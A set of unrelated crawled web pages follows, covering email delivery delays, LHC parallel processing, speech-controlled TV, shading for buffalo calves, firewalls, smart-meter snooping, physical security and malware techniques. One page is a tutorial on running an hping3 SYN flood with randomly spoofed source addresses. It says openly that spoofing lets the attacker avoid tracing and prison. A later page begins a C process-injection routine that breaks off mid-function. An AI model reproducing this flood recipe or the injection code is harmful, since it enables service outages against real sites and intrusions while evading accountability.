YMCKOK (Yellow/Magenta/Cyan/Monochrome/Overcoat/Monochrome) – Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying degrees to make a full spectrum of colors. Monochrome or 'K' is a black resin panel, and clear overlay or 'O' is a thin, protective layer. The latter 'K' is used for monochrome printing on the back side of a card. | <urn:uuid:7add2928-8bf8-4a1b-a72d-0425c3a20ebe> | CC-MAIN-2017-04 | http://www.idzone.com/learning-center/id_glossary_of_terms.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00153-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902741 | 6,654 | 2.578125 | 3 |
Why Email is Not Instantaneous — and Not Supposed to Be
The common perception is that email messages seem to arrive almost as soon as they are sent. Messages often appear to be delivered “instantaneously“. So, when a message is occasionally delayed, it seems like something must be wrong. Sometimes there is a problem. Sometimes the delay is the result of normal email flow.
If the messages never show up at all … that is a different situation altogether. See “Where’s the Email? The Case of the Missing or Disappearing Email” for ideas on diagnosis and understanding of that.
The multi-server delivery path
When an email message is sent, it is given to an email server for processing and delivery. That email server may forward it on to another email server, and so on, until it ultimately arrives in the recipient’s mail box.
Generally messages will pass though at least two email servers (the sender’s and the recipient’s). In some cases, when the sender and recipient are on the same machine and it is setup in a certain way, the email may be delivered on arrival. This is not unusual for internal corporate email, but rarely happens for general email messages.
In most cases, the sender’s and recipient’s email systems may each pass the message though multiple servers for various reasons, resulting in the message traversing many servers (a.k.a “hops”) in its delivery path.
Email is designed to be extremely reliable — messages should always make it to their destinations, if at all possible.
Each server in the delivery path that accepts the email message is responsible for ensuring that the message makes it to the next server. If nothing goes wrong, the hand off can take place very quickly (in less than a second in many cases). However, many times, things do happen such as:
- DNS or network issues prevent the server from being able to determine what server is supposed to be next.
- Communications with the next server are temporarily failing due to network issues or Internet congestion.
- The server itself is very busy at the moment.
- The next server is very busy at the moment and temporarily refusing connections.
- Additional processing of the message needs to take place before it can be relayed to the next server.
Each of these things can result in the message being delayed in reaching the next server.
If the server itself is busy or needs to perform further actions on a message, it may defer (or queue) processing of the message for a short time until it has available capacity. This often happens if there is a “spike” where many messages are arriving at a server in a short time, pushing its ability to process them all. In cases like this, servers respond by delaying some messages until they can catch up.
If the next server cannot be determined or reached or is not accepting email temporarily, then the message must be queued and delivery re-tried later.
Queue processing delays
When messages are temporarily deferred for later re-try or processing, they are often “queued”. This means that they are dumped into a special location for pending messages. Mail servers will check their queues periodically and process the messages waiting there to get them going. However,
- It is up to the mail server administrators to manage how often the queue is checked and processed. This interval can be low (like once/minute) or slower (like once every 5-10 minutes, every hour, or worse).
- If the queues are getting full (e.g. lots and lots of messages are there), it may take a long time to process them all.
- Even if a message is quickly re-tried, it will not be delivered until the next server is available and reachable.
Generally, messages are kept in mail queues and retried over and over for up to 5 days; however, some systems (such as public providers like AOL, Hotmail, Yahoo, Gmail, bulk mailers, etc.) may have much shorter grace periods for successful delivery.
Some other common reasons for apparent delays include:
- Large Messages: Messages size can affect delivery times when it is transmitted over relatively slow, low-bandwidth, or very busy connections. It may take some time to upload a large message to the server, resulting in an apparent delay. For example, if you have a 50MB email message to send and a 512 Kbps DSL line, it will take over 13 minutes to upload the message. Additionally, large messages will slow down processing and delivery at every stage in the process.
- Many Recipients: Messages addressed to large numbers of recipients take much more work to process, resulting in additional apparent delays.
“Sender Offline” delays:
Often when customers ask about message delays and we look into the cause, it appears that for example the message was sent last night but did not arrive until the next morning. What has often occurred in these cases is that the sender composed and sent the message when offline — Their Internet connection was down, they already unplugged, etc. The “Date” stamp on the message is when they “sent” it (and it was put in their Outbox). However, the message never left the sender’s computer until the next day when the sender went back online and opened his/her email program.
In this case, the apparent delay is the sender’s “fault” for not being online when sending.
Occasional delays aren’t uncommon
When multiple servers must each process the message, must be able to communicate with each other, and must have the capacity to manage the processing requirements, delays can and do occur. In fact, the more servers in the path, the more likely a delay is to happen.
It is typical to see occasional delays of up to 1-3 minutes in email delivery due to random issues like server processing loads and network traffic spiking here and there on the Internet.
Delays of tens of minutes to hours are most often the result server maintenance or outage issues, or mail queues not being properly or promptly processed.
Where was the delay?
We are commonly asked to look at a message that was received to determine where/why the delay occurred. It is actually quite easy to figure this out.
First, you need to get the full headers of the received email message. See Viewing the Full Source/Headers of an Email message.
An example delayed email messages might contain header lines that look like this:
Received: via dmail for +INBOX; Tue, 3 Feb 2013 19:29:12 -0600 (CST) Received: from abc.luxsci.com ([10.10.10.10]) by xyz.luxsci.com (8.13.7/8.13.7) with ESMTP id n141TCa7022588 for <email@example.com>; Tue, 3 Feb 2013 19:29:12 -0600 Return-Path: <firstname.lastname@example.org> Received: from [192.168.0.3] (verizon.net [22.214.171.124]) (email@example.com mech=PLAIN bits=2) by abc.luxsci.com (8.13.7/8.13.7) with ESMTP id n141SAfo021855 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT) for <firstname.lastname@example.org>; Tue, 3 Feb 2013 19:18:05 -0600 Message-ID: <4988EF2D.email@example.com> Date: Tue, 03 Feb 2013 20:10:10 -0500 From: "Test Sender" <firstname.lastname@example.org> MIME-Version: 1.0 To: "Test Recipient" <email@example.com> Subject: Example Message Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Comment: Lux Scientiae SMTP Processor Message ID - 1233710941-9110394.93984519
It is the “Date” and “Received” header lines that are of importance.
The “Date” header is added by the sending email program (i.e. Outlook) and may be blatantly inaccurate, for example if the sender computer’s clock is off. Also, the “Date” is added when the message is sent, not when the message leaves the sender’s “Outbox”. So, if the sender is offline for some reason, or the message is otherwise sitting in the Outbox, the message may look “delayed”. In this example, the delay is merely in getting the message off of the sender’s computer.
The “Received” header lines are added by the mail servers that process the message. One Received header line is added each time a mail server accepts the message for processing. They are added from the “bottom up” — so the last added Received line is at the top and the first is at the bottom.
You can detect where the delays happened by looking at these header lines, in order, and comparing the date and time stamps (once you correct for differences in time zones).
In this contrived example, we see that:
- The message was sent at 8:10:10 pm Eastern Time
- The message was delayed in the sender’s Outbox for 7 minutes, 55 seconds, based on the first “Received” line, It also may just have taken a long time for the message to be uploaded to the server, i.e. if the message was big and the connection slow.
- For some reason, this mail server delayed the message for about 11 minutes before it made it to the recipient’s server, where it was accepted and delivered immediately.
One could then ask the IT staff running example server “abc.luxsci.com” to look into their logs for information as to why the message was delayed for 11 minutes, if this delay is significant to you.
- Tracing the Origin of an Email Message — and Hiding it
- How Can You Tell if an Email Was Transmitted Using TLS Encryption?
- Automate Secure Outbound Email Sending with SecureLine
- Having Problems Sending Email Because Your ISP is Blacklisted?
- Brand the Email Headers of your Outbound Bulk Email: LuxSci High Volume | <urn:uuid:a948901c-def4-401e-a7b6-5e9e98db70d2> | CC-MAIN-2017-04 | https://luxsci.com/blog/why-email-is-not-instantaneous-and-not-supposed-to-be.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.923837 | 2,243 | 2.5625 | 3 |
The Large Hadron Collider (LHC) relies on parallel processors, including coprocessors, to power its massive acquisition system. Without the computational power afforded by these processors, discovery is hampered. The reach of the science is supported in part by improvements in computational speed.
Valerie Halyo, research scientist in the Department of Physics at Princeton University, is a big proponent of using parallel processing to accelerate scientific discovery. In her latest work, Halyo and her team evaluated several accelerators such as the NVIDIA Tesla GPU and Intel Xeon Phi in concert with multi-core Intel Xeon CPUs. Halyo advises to leverage Xeon Phi as “it is possible to develop and optimize a single code in C, C++, or FORTRAN to use on both a multi-core CPU and on a Xeon Phi coprocessor.”
Listen to our Soundbite interview with Dr. Valeri Halyo here.
Acquiring data from the LHC requires substantial computational power to satisfy the needs of the data acquisition or triggering system. Triggering effectively keeps relevant data and throws away the useless ones. The overarching goal is to process the acquired data fast enough to reconstruct the trajectories of charged particles in real-time.
Traditional reconstruction algorithms aren’t able to cope with the massively dense datasets generated from the system. These algorithms are simply overwhelmed with the high pile-up of information. By leveraging parallel processing, this is no longer an issue. Not only does it overcome the initial challenge of parsing large amounts of data, it also enables the development of new complex triggering algorithms. With parallel processing, the LHC triggering system is more efficient. More data is captured in less time.
In evaluating their triggering algorithm based on the Hough transform, Halyo notes that 92% of the execution time is spent on computing the Hough transform itself. Halyo provides the following tips for optimizing their algorithm for parallel processors.
NVIDIA Tesla K20c (GPU)
- Minimize expensive trigonometric functions.
- Develop an efficient memory access pattern for reading and writing to global memory.
- Avoid race conditions by safely handling updates of values.
- Reduce global memory accesses.
- Replace atomic memory accesses from global memory to shared memory.
Intel Xeon E5-2697v2 (CPU) and Intel Xeon Phi QS-7120P (MIC)
- Use thread parallelism for the outer loops of the Hough transform.
- Utilize the auto-vectorization capabilities of the Intel compiler.
- Avoid cross-thread synchronization using OpenMP’s reduction mechanism and thread-private data storage.
- Improve synchronization by using ordered for-loops.
- Improve data locality via strip-mining and blocking techniques.
- Use the offload functionality for the Xeon Phi.
- Use data persistence to avoid reallocation penalties for multiple frames.
Although the Hough transform is a highly parallel task, the nature of the calculation hampers complete utilization of the coprocessors. Halyo notes that the irregular data access patterns significantly affects the performance of the NVIDIA GPU and Xeon Phi coprocessor. In the end, the Intel Xeon CPUs fared best for various sample sizes, but Halyo still supports the use of coprocessors noting that when the hardware and software matures, “it could be the leap necessary to discover new physics at the LHC.” | <urn:uuid:44fa3243-41a3-4f6e-b271-d8ef1dd03cf4> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/02/17/pushing-parallel-processing-power-cern/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.863581 | 708 | 3.25 | 3 |
Tech View: Technology for Making TV Viewing Easy
TV viewing has become harder. With massive amounts of available content—some homes have access to 400+ channels, a number that may rise soon to 1,000—and accessory devices such as set-top boxes, DVRs, converter boxes, TiVo®, and VCRs, watching and recording TV requires some effort. Programs of true interest and their times have to be hunted down amid all the other programs, buttons on multiple remotes have to be identified, and the interfaces of the DVR and other devices must be mastered (some more intuitive than others).
Cutting through this clutter to make TV viewing easy again is becoming increasingly important. Solutions include universal remotes, Windows®-type interfaces, and even hand gestures, but they themselves require some learning and may be just a different way to manage the clutter.
One solution, however, requires little or no learning, is simple and natural and intuitive, and actually does away with clutter-speech. Instead of scrolling through lists or navigating a menu or tapping out instructions, a speech interface let's you say what you want to watch. Speaking "The Real Housewives of New Jersey" or "Knicks game" into a microphone-based remote would return a short, selectable list of programs fitting the description, giving times and days.
How long before speech-controlled TV is a reality? Maybe not too long. The technologies are pretty much in place.
What's missing to make speech-controlled viewing possible are the computing resources needed to perform speech recognition on the thousands of TV shows and videos available to consumers. A speech recognition application works by matching spoken words to words (really sounds of words) contained in a language model that has been carefully constructed for a specific application and context, such as a banking call center. For speech-controlled viewing, the language model would contain everything in an electronic program guide. Not only is this a huge collection of words to recognize, it's one that would have to be updated at least nightly to keep it current with programming changes.
While some devices have onboard speech recognition (the iPhone, for example), device-based speech recognition would be impractical for a model as large as the one required by an electronic program guide. Neither the TV nor set-top box (or remote) has sufficient computing resources for performing speech recognition on all available content. While there are hardware solutions for adding PC-type resources to these devices, new hardware increases the costs to the consumer.
In addition, there is the very practical problem of having to download to each device a new language model as programming changes are made. Downloading might occur as often as every night. Software changes would also have to be periodically downloaded.
The preferred solution is to do all the speech processing on networked servers, and connect the TV set-top box to the same network using a residential, or home, gateway. Commands spoken into a remote would be relayed from the gateway over the network to a central location where servers would perform the necessary speech recognition.
This scheme is similar to using an iPhone or other smartphone to request a listing from a business search such as YELLOWPAGES.COM®. The spoken request is relayed via the cell network to speech recognition servers, where the spoken request is converted to commands used for the database lookup.
. . . do all the speech processing on networked servers, and connect the TV set-top box to the same network . . .
With speech recognition done at a central location, updates to both software and the language models can be done easily and as frequently as needed. There is an added benefit. The spoken commands used by people in the home represent hard-to-get, real-world sample data that can be used in training the models to improve performance. If speech recognition was done on the device, this valuable resource would be more difficult to exploit for refining the models.
Benefits of a connected TV
If server resources become available to at-home TV viewers, a lot more can happen to make TV viewing easy again.
With servers performing program lookup, searches can become more complex and involve metadata such as program type, actor, or any combination of search criteria. Thus you could search not just by title but also by genre or actor. Speaking "Late Night Comedy Show," "Basketball games on Sunday night," or "Movies with Kiefer Sutherland" would get back a list of programs fitting the description.
But why stop there? With computing resources available, why not put the server resources to work to suggest programs or videos you might like? You could just say What's on tonight? and have the TV return a list of suggestions tailored for your preferences. If Netflix® and book vendors can make reasonable guesses as to what you'd like, TV providers can run similar algorithms on TV programming data stored on the centralized servers.
The servers could also program the DVR for you. If you want to record a program, just say what you want to record and once the speech recognition is performed, the instructions could be sent directly to the DVR. No need for you to be involved other than to say what you want.
The potential of IPTV
Connecting TV devices to a content provider's servers over a network is the IPTV model, a relatively new paradigm in which a private provider (usually the telephone company) distributes content over an existing broadband infrastructure by first encoding it and relaying it as a series of IP (Internet Protocol) packets over a broadband network, rather than over traditional cable or the airwaves.
(Although IP is the same protocol used to relay video over the Internet, IPTV is not TV over the Internet; it's not the same as watching YouTube clips on a PC. Instead, IPTV is high-quality, high-resolution video that's delivered over a broadband connection, which can also deliver Internet content such as web pages, YouTube video, email, etc.)
An example of an IPTV service is AT&T's U-verseSM, where a home gateway connects the TV set-top box to AT&T's broadband network, enabling the set-top box to communicate with servers running AT&T's WATSON ASR (and other speech technologies) as well as with other devices on the network. The TV set-top box is essentially an endpoint on the network, just the same as a PC, laptop, or iPhone.
To stream speech to the network servers, it is advantageous to exploit the Wi-Fi feature of the U-verse gateway. With its Wi-Fi capability, the gateway could also serve as an access point for any Wi-Fi-enabled devices (TV remote, laptop, iPhone) to communicate with other endpoints on the IP-based home network, including any home PCs. Thus computer files, including emails and photos, could be viewable on the TV, and any Wi-Fi enabled device (such as the iPhone) could control the set-top box and DVR.
If the TV's set-top box is a node on a network, communication between the home and the provider becomes two-way, with commands going out and programs and device instructions coming in. While the full ramifications of two-way communication are not yet known, it is certain that interactivity will be a major benefit of IPTV and will include much more than just shopping or participating in game shows from home.
Speech-controlled viewing is not quite ready due to several factors. Some are long-standing ASR problems, such as the constant puzzle of predicting what people may say and the difficulty in recognizing uncommon accents or the high-pitched voices of children.
In addition, speech-controlled viewing brings its own set of hard problems.
But these are problems for the engineers.
What would consumers have to do to make TV-viewing easy again?
Not much, other than subscribing to an IPTV service that offers speech recognition and a voice remote. For many people, having IPTV means replacing a cable service with an IPTV one. (IPTV service will normally be offered as part of a triple- or quadruple-play package that includes phone (wireline and wireless), Internet, and TV.
From then on everything else is easy since the provider maintains the servers and software and takes on the responsibility for programming the DVR. All consumers need to do is say what they want to watch using their own words.
How to Use a Voice Remote
Tech View: Views on Technology, Science and Mathematics
Sponsored by AT&T Labs Research
This series presents articles on technology, science and mathematics, and their impact on society -- written by AT&T Labs scientists and engineers.
For more information about articles in this series, contact: firstname.lastname@example.org. | <urn:uuid:c3278471-0f87-40a1-b72d-fae8f22d55d5> | CC-MAIN-2017-04 | http://www.research.att.com/articles/featured_stories/2009/200910_techview_tech_making_tv_viewing_easy.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00455-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950864 | 1,802 | 2.515625 | 3 |
Gu Z.,Yunnan Agricultural University |
Yang S.,Yunnan Agricultural University |
Yang S.,Yunnan Provincial Key Laboratory of Animal Nutrition and Feed Science |
Leng J.,Yunnan Agricultural University |
And 7 more authors.
Applied Animal Behaviour Science | Year: 2016
Shade shelter is widely used to reduce heat load for farm animals, but little research focus on the cooling effects for Dehong buffalo calves. The aim of this experiment was to evaluate the impacts of shade cooling on the physiological and behavioural parameters for Dehong buffalo calves. Shade with 99% blockage of solar radiation was covered on steel frame with a 2.5. m height above the loafing area floor (shaded). The loafing area of the control group was the same as the shaded group, apart from no shade shelter above the loafing area (non-shaded). Twenty-four Dehong buffalo calves were randomly and averagely allocated to the non-shaded and shaded groups. Six Dehong buffalo calves were loose housed in a barn, and they had access to loafing area. The results showed that the average daily air temperature of the loafing area under shade was lower 1.5. °C than that of the loafing area without shade shelter. No difference in rectal temperature was found between the non-shaded and shaded calves (P >. 0.05), but respiration rate of the non-shaded group in noon (12:00. h, 31.6 breaths) and evening (18:00. h, 28.5 breaths) was greater than for calves in shaded group (26.1 and 25.3 breaths, respectively) (P <. 0.05). When ambient temperature exceeded 30. °C, shaded calves spent much of their time (21.7%) lying in the loafing area, and no calf in non-shaded group preferred to lie in the loafing area with strong solar radiation (P <. 0.05). The use of shade for calves was affected by thermal environment, and the use of shade was greater (41.4%) in hot weather (above 30. °C) than that of the warm weather (22-29. °C) (P <. 0.05). In conclusion, the provision of shade above the loafing area is conducive to improving thermal environment for Dehong buffalo calves in subtropical area characterised with high ambient temperature coupled with high humidity in summer. © 2016. Source | <urn:uuid:43f8721a-0551-494a-88ee-45f58e59ef8f> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bureau-of-animal-husbandry-and-veterinary-medicine-80223/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00365-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920123 | 521 | 2.59375 | 3 |
Welcome back everyone, let's talk about DoS attacks and hping3! DoS attacks (DoS stands for Denial of Service) are some of, if not the, most common attacks. Not to be confused with DDoS, a DoS attack is when a single host attempts to overwhelm a server or another host. This is done by exhausting the target's resources so that they cannot be used by others.
There is a tool by the name of hping3 that allows the attacker to craft and send custom packets. This lets us do many things, including recon and possibly some basic exploitation, but for now we're going to use it to launch a DoS attack. There are multiple kinds of DoS attacks, but today we're going to launch a SYN flood. This sends requests to a server as fast as it can. As these requests are processed, they take up the server's resources and render it unable to respond to any actual users trying to use it.
The problem with DoS attacks is that when we send all these packets to the server, they carry our address. All the administrator has to do is look at the logs and turn our address over to the authorities, and we're behind bars in a matter of days. So we're not only going to launch a SYN flood, we're also going to spoof our address so we don't get thrown in the big house! Before we launch the attack, let's discuss the concept of SYN flooding in more depth.
As we previously stated, a SYN flood is sending an insane number of requests to a server in order to use up all its resources. But you may be asking, "What does SYN have to do with using up resources?" Well, it's all about the TCP three-way handshake.
If you haven’t already read the second recon article, I suggest you do so in order to understand the TCP three-way handshake. Remember, SYN stands for synchronize. When we send a SYN packet, we’re requesting to establish a connection.
We can see that the attacker sent many SYN packets (with spoofed addresses) to the victim. The victim responded with a SYN-ACK to confirm the connection, but since there was no response, it sends it again and again, using up all its resources! Also, since the attacker used a fake address, the administrator will have a much more difficult time tracing the source of the attack.
Now that we know how SYN floods work, let’s get to launching the attack!
Launching the DoS Attack
First things first, we’ll need to look at the help page for hping3. In order to condense the output, I’m going to grep the lines that are essential. Let’s see the flags we need to use:
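On most builds, the relevant help lines look roughly like this (treat the exact wording as an approximation, since it varies between hping3 versions):

    $ hping3 --help | grep -e flood -e interface -e rand-source -e syn
      -I  --interface  interface name (otherwise default routing interface)
          --flood      sent packets as fast as possible. Don't show replies.
      --rand-source    random source address mode. see the man.
      -S  --syn        set SYN flag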
We can see here that we need to use --flood, --interface, -S, and --rand-source. These flags are fairly self-explanatory, but let's run through them. Using --flood will set hping3 into flood mode; this is the flood part of our SYN flood. Then we have --interface, so we can decide which network interface to send our packets out of. The -S flag sets the SYN flag on each packet, which is what makes this a SYN flood rather than a plain packet flood. Finally we have --rand-source, which will randomize the source address of each packet. Not only will the source not point back to us, but the traffic will appear to come from a wide range of addresses, which increases the trace difficulty even further.
Now that we know what flags we’re going to use, let’s launch our attack. I’m going to be launching this attack against a VM I’ve set up, Metasploitable 2. First, let’s ping the Metasploitable VM to make sure it’s up and running, then we’ll ping it again when we launch our attack to see the effect. Let’s ping it now:
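On a healthy target the pings come back cleanly; the output will look something like this (10.0.0.37 is the Metasploitable VM's address, the same one that shows up in the captures below):

    $ ping -c 4 10.0.0.37
    PING 10.0.0.37 (10.0.0.37) 56(84) bytes of data.
    64 bytes from 10.0.0.37: icmp_seq=1 ttl=64 time=0.45 ms
    64 bytes from 10.0.0.37: icmp_seq=2 ttl=64 time=0.41 ms
    64 bytes from 10.0.0.37: icmp_seq=3 ttl=64 time=0.43 ms
    64 bytes from 10.0.0.37: icmp_seq=4 ttl=64 time=0.42 ms

    --- 10.0.0.37 ping statistics ---
    4 packets transmitted, 4 received, 0% packet loss, time 3004ms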
Alright, our VM is up and running. Now let’s take a look at the command we’ll use to launch our attack before we do it:
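The command takes this shape, where 10.0.0.37 is the target VM and eth0 is the attacking machine's interface; adjust both for your own lab. In practice you would usually also aim at a listening port with -p 80, although that flag isn't one of the four discussed above:

    $ hping3 -S --flood --rand-source --interface eth0 10.0.0.37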
Alright, now that we have our command, let's execute it. Once the attack has started, we should see some output like this:
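hping3 prints a short banner and then goes silent, since flood mode doesn't display replies; expect something close to:

    HPING 10.0.0.37 (eth0 10.0.0.37): S set, 40 headers + 0 data bytes
    hping in flood mode, no replies will be shown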
There we go! Now we’re flooding the target. To see our spoofed packets in action, let’s open up one of the best network sniffers out there, wireshark. We should be able to see packets from multiple addresses being flooded towards the same address. Let’s take a look at the packets the wireshark has captured:
Here we can see 5 packets, each with its own unique source address! We can see that they are being sent to our target at the IP 10.0.0.37, with the SYN flag set. Now that we're attacking our target, let's retry pinging it and see what happens:
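This time the pings go unanswered; the output will look something like this:

    $ ping -c 4 10.0.0.37
    PING 10.0.0.37 (10.0.0.37) 56(84) bytes of data.

    --- 10.0.0.37 ping statistics ---
    4 packets transmitted, 0 received, 100% packet loss, time 3055ms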
We can see by this ping output that our pings failed; we can't reach the server anymore! This proves that our attack was effective: the server spent all its resources responding to our attack instead of the real users. We've successfully DoS'd our target!
Since we’ve randomized the source of every packet, it will be much more difficult for an administrator. Now we can launch DoS attack without landing ourselves a seat in prison!
I know this tutorial isn't really related to any of my currently running series, such as the recon series. But due to the recently published article on DoSing with LOIC, I felt this was necessary so that if anyone does decide to use this power for evil, they won't land themselves in prison. I'm just looking out for my fellow hackers! The next article will be the start of a brief course teaching the basics of Python; I'll see you there!
DISCLAIMER: HackingLoops does not condone the use of these tools for illegal activities, we’re just here to educate! | <urn:uuid:da62222b-b7f5-44cf-beec-96f3eeec5117> | CC-MAIN-2017-04 | https://www.hackingloops.com/category/ddos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00391-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928922 | 1,310 | 2.875 | 3 |
The presence of a firewall, whether it’s hardware or software, provides a significant security boost for any computer user. This is especially true if you manage a business. Companies need to ensure that their systems are sufficiently protected in order to prevent the infiltration of viruses, bugs, or hacking. Firewalls are an indispensable security measure that dramatically reduces risks to your business network.
As the internet has grown and progressed over the years, websites have become more interactive and functional. Many company websites are used to collect customer information, take online orders, complete transactions, host chat conversations, and much more. With so much information being stored electronically, it is critical for businesses to do everything in their power to protect it. Losing company or customer data can have a significant impact on a company, such as hindered productivity or a tarnished reputation. In some cases, it can even result in the closure of a business.
Additionally, if your company uses cloud computing to store important information, a firewall helps minimize risk. Although many cloud computing hosts offer higher levels of security, businesses should still do what is in their power to protect themselves. Cloud computing is a great service for businesses because of its ease of use, but storing data electronically can pose a risk if it is not properly protected on both ends: by the cloud host and by the company using its services.
In some cases, hackers are infiltrating business networks in order to piggyback on their internet service. This can result in hefty overage fees, costing the company a considerable amount of money. Additionally, if a hacker is stealing a significant amount of bandwidth, employees may experience a slow internet connection. Again, this can impact productivity, which then results in a loss of revenue.
A firewall can keep track of suspicious logins, filter out SPAM emails, and block suspicious applications. It can also monitor network activity and create a log, which can assist in identifying where and when a breach may have occurred. This feature can help your company contain and fix the problem faster, instead of trying to address the issue after the damage has already been done.
Many hardware and software companies are now providing firewalls that are specifically designed for businesses. As more businesses and customers continue to migrate online, there is an increased necessity for reliable security measures. If the proper defenses are not put in place, a business may be at risk of losing everything.
To learn more about obtaining a secure connection, click here.
Blog Posted by Vanessa Hartung | <urn:uuid:5f01a9d3-54bb-4b2e-972b-779b940c7c7d> | CC-MAIN-2017-04 | http://blog.terago.ca/2012/12/13/why-your-company-needs-a-firewall/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00209-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948347 | 512 | 2.5625 | 3 |
As technology becomes more prevalent and easier to use, a security breach also becomes more likely -- and the use of wireless home utility meters is no exception. As of 2010, more than one-third of all homes in the U.S. use automatic meter reading (AMR). The technology is useful because it makes data collection easier, but according to researchers at the University of Southern California (USC), the unencrypted signal may also be easier for an eavesdropper to read.
"There's been a lot of discussion about smart meters and whether they're secure or not," Lead Researcher Wenyuan Xu told Phys.org. "But smart meters are not yet widespread. So we wanted to look at the wireless readers common now. Are they secure? Will they leak private information?"
Like many technologies, wireless readers also reduce the demand for human workers. A single worker can drive a truck down a street and collect information on hundreds of houses, rather than having many workers manually gather data from each meter. Unfortunately, this also means easier access for people who are not supposed to have such data.
Xu's team was able to reverse-engineer the transmission technology used by the meters to obtain access to meter usage data. Once the team understood how the technology worked, they attached an antenna and an amplifier to a laptop and visited an apartment complex to do some snooping.
"We were able to detect even further than we expected," Xu said. "The complex had 408 units, but we were able to see 485, so we were seeing beyond the complex itself." Additionally, the data could be matched to individual apartments because the packet data contained identification numbers that matched numbers stamped on the physical meters found on the apartments.
While Xu's team said they believed the packet data transmitted should be encrypted, they admitted that such snooping is not easily done. However, in the wrong hands, the data could be misused by “bad guys,” Xu said.
Read the full story about unencrypted utility meter signals on Phys.org.
Photo courtesy of Shutterstock.com | <urn:uuid:d863d612-0420-463b-b59a-1959f866e7a5> | CC-MAIN-2017-04 | http://www.govtech.com/Study-Unencrypte-Smart-Meter-Signal-Easy-to-Read.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00511-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.971191 | 433 | 2.765625 | 3 |
Get a glimpse inside Roberta Bragg's new book "Hardening Windows systems" with this series of book excerpts. This excerpt from Chapter 1, "An immediate call to action," offers a quick overview on how to secure systems, starting with your own laptop and PDA. Click for the complete book excerpt series or purchase the book.
Physically secure all systems
Start with your own system. If it's a laptop, do you cable-lock it at each place you use it? If you move about, even in your own buildings, do you take the time to secure it? When you travel, do you leave it unlocked in the hotel room? When you must leave the laptop in a hotel room, what data is on the hard drive? With most laptops, the hard drive can be removed even if the computer is cable-locked. The value of the data may be many times higher than the value of the computer. If data on the laptop is sensitive, perhaps you can remove the hard drive and carry it with you, or lock it in the hotel safe when you want to leave the laptop locked in the room.
What about your PDA? What's on it that would be damaging if lost? If your computer is a desktop, who can physically access it? Can it be stolen? The hard drive removed? From the data center to the traveling laptop, physical security is weak. Why would an attacker bother crafting code to break into your systems when all she has to do is steal them? Why penetrate your network defenses when she can walk by and insert a CD-ROM with malignant code on it? Or use her USB data-storing wristwatch to steal data?
Keep servers locked up. Remove CD-ROMs and floppies from computers in public areas. Provide traveling laptop users with cable locks. Make sure those with access to the data center don't allow others in. Don't prop open doors; don't allow "tailgating," the process where someone follows an authorized person into the data center. Teach security guards to look for contraband. (Picture-taking phones should be banned from many locations.)
Click for the next excerpt in this series: Keep secrets.
Click for book details or purchase the book. | <urn:uuid:c43e0322-be95-4c22-b3af-f0afd2e439c9> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096119/Physically-secure-all-systems | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940747 | 486 | 2.640625 | 3 |
I saw a webcast done by Peter Ewane and Javvad Malik recently. The summary of what Peter had to say and Q&A follows; you can also view the recorded webcast.
What is Malware?
Malware can be a lot of things. It can be a virus, a worm, spyware, a Trojan horse, or ransomware. It’s basically any malicious program that you would not want on your computer.
Lately it has become common to see malware hide in the Windows Registry. Why the Windows registry? The Windows registry is quite large and complex, which means there are many places where malware can insert itself to achieve persistence. A good example of this behavior is Poweliks. Poweliks sets a null entry utilizing one of the built-in Windows APIs, ZwSetValueKey, which allows it to create a registry key with an encoded data blob. I'm not sure why the Windows API allows a null entry, but it does. This is one of the many ways that malware can utilize the Windows registry to hide out, autostart, and maintain persistence on many systems.
Here’s an OTX pulse on Poweliks: https://otx.alienvault.com/browse/pulses/?q=POWELIKS
Process injection is exactly what it sounds like: injecting bits of code into a running process. Malware leverages process injection techniques to hide code execution and avoid detection by utilizing known "good" processes such as svchost.exe or explorer.exe. To inject itself into known good processes, malware uses built-in Windows APIs. One of them is the debug privilege. When a process enables the debug privilege, it gains access to many of the debug API calls, such as attaching to other processes and instructing processes to allocate additional memory. Once a process has allocated more memory, a malicious process can inject whatever code it wishes into that process.
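As a hedged illustration of that pattern, here is a minimal C sketch built on the documented Win32 calls; the payload buffer is a placeholder, error handling is thin, and real malware would typically enable SeDebugPrivilege first:

    #include <windows.h>

    /* Allocate memory in a victim process, copy a payload into it, and
       start a thread at the payload -- the injection flow described above. */
    BOOL InjectCode(DWORD pid, const BYTE *payload, SIZE_T size)
    {
        HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        if (!proc) return FALSE;

        /* instruct the target process to allocate additional memory */
        LPVOID remote = VirtualAllocEx(proc, NULL, size,
                                       MEM_COMMIT | MEM_RESERVE,
                                       PAGE_EXECUTE_READWRITE);
        BOOL ok = FALSE;
        if (remote && WriteProcessMemory(proc, remote, payload, size, NULL)) {
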